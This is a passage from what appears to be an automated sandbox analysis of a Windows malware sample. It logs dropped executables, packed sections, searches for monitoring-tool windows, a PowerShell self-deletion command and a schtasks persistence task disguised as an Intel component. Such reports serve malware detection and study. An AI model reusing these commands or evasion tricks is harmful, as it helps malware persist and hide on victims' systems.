                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: file.exeStatic file information: File size 2943488 > 1048576
                          Source: file.exeStatic PE information: Raw size of eokeitfr is bigger than: 0x100000 < 0x29ce00
                          Source: Binary string: wkernel32.pdb source: 1459165c97.exe, 0000002A.00000003.3316733484.0000000005F50000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3316638415.0000000005E30000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdb source: 1459165c97.exe, 0000002A.00000003.3316994086.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3317173955.0000000006050000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3326988369.00000000055F0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3324377603.00000000053D0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdb source: 1459165c97.exe, 0000002A.00000003.3315847424.0000000006020000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3315660818.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3319193726.00000000053D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3319970257.00000000055C0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdbUGP source: 1459165c97.exe, 0000002A.00000003.3316144032.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3316322619.0000000005FD0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3321405527.0000000005570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3320430105.00000000053D0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdbUGP source: 1459165c97.exe, 0000002A.00000003.3315847424.0000000006020000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3315660818.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3319193726.00000000053D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3319970257.00000000055C0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: 1459165c97.exe, 0000002A.00000003.3316144032.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3316322619.0000000005FD0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3321405527.0000000005570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3320430105.00000000053D0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdbUGP source: 1459165c97.exe, 0000002A.00000003.3316994086.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3317173955.0000000006050000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3326988369.00000000055F0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3324377603.00000000053D0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernel32.pdbUGP source: 1459165c97.exe, 0000002A.00000003.3316733484.0000000005F50000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3316638415.0000000005E30000.00000004.00000001.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;eokeitfr:EW;xdqbfquo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;eokeitfr:EW;xdqbfquo:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.610000.0.unpack :EW;.rsrc:W;.idata :W;eokeitfr:EW;xdqbfquo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;eokeitfr:EW;xdqbfquo:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.610000.0.unpack :EW;.rsrc:W;.idata :W;eokeitfr:EW;xdqbfquo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;eokeitfr:EW;xdqbfquo:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.610000.0.unpack :EW;.rsrc:W;.idata :W;eokeitfr:EW;xdqbfquo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;eokeitfr:EW;xdqbfquo:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeUnpacked PE file: 42.2.1459165c97.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hrqcmbfk:EW;baxohzut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hrqcmbfk:EW;baxohzut:EW;.taggant:EW;
                          Suspicious powershell command line found
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: random[1].exe.6.drStatic PE information: real checksum: 0x1ee878 should be: 0x1ebe46
                          Source: 1459165c97.exe.6.drStatic PE information: real checksum: 0x1ee878 should be: 0x1ebe46
                          Source: random[1].exe1.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                          Source: Intel_PTT_EK_Recertification.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                          Source: 5639a58f3b.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                          Source: 850609077b.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                          Source: 7z.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                          Source: file.exeStatic PE information: real checksum: 0x2da339 should be: 0x2d4f38
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x2da339 should be: 0x2d4f38
                          Source: in.exe.25.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                          Source: random[1].exe0.6.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                          Source: 7z.dll.14.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name: eokeitfr
                          Source: file.exeStatic PE information: section name: xdqbfquo
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name: eokeitfr
                          Source: skotes.exe.0.drStatic PE information: section name: xdqbfquo
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: hrqcmbfk
                          Source: random[1].exe.6.drStatic PE information: section name: baxohzut
                          Source: random[1].exe.6.drStatic PE information: section name: .taggant
                          Source: 1459165c97.exe.6.drStatic PE information: section name:
                          Source: 1459165c97.exe.6.drStatic PE information: section name: .idata
                          Source: 1459165c97.exe.6.drStatic PE information: section name:
                          Source: 1459165c97.exe.6.drStatic PE information: section name: hrqcmbfk
                          Source: 1459165c97.exe.6.drStatic PE information: section name: baxohzut
                          Source: 1459165c97.exe.6.drStatic PE information: section name: .taggant
                          Source: in.exe.25.drStatic PE information: section name: UPX2
                          Source: Intel_PTT_EK_Recertification.exe.27.drStatic PE information: section name: UPX2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCD91C push ecx; ret 0_2_00FCD92F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC1359 push es; ret 0_2_00FC135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0062D91C push ecx; ret 2_2_0062D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_0062D91C push ecx; ret 3_2_0062D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0062D91C push ecx; ret 6_2_0062D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0062DFC6 push ecx; ret 6_2_0062DFD9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D9534A push ecx; ret 8_2_00D9535D
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00DB6C1C pushad ; iretd 8_2_00DB6C1E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043C050 push eax; mov dword ptr [esp], D7D6D5A4h10_2_0043C051
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004468BC pushad ; ret 10_2_0044691E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004450B9 push edi; ret 10_2_0044510D
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00439300 push eax; mov dword ptr [esp], 0B0C0D0Eh10_2_0043930E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D9534A push ecx; ret 10_2_00D9535D
                          Source: file.exeStatic PE information: section name: entropy: 7.9768208267474385
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.9768208267474385
                          Source: random[1].exe.6.drStatic PE information: section name: entropy: 7.974839117664992
                          Source: random[1].exe.6.drStatic PE information: section name: hrqcmbfk entropy: 7.952488066525872
                          Source: 1459165c97.exe.6.drStatic PE information: section name: entropy: 7.974839117664992
                          Source: 1459165c97.exe.6.drStatic PE information: section name: hrqcmbfk entropy: 7.952488066525872
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1

                          Persistence and Installation Behavior

                          barindex
                          Uses cmd line tools excessively to alter registry or file data
                          Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeJump to dropped file

                          Boot Survival

                          barindex
                          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
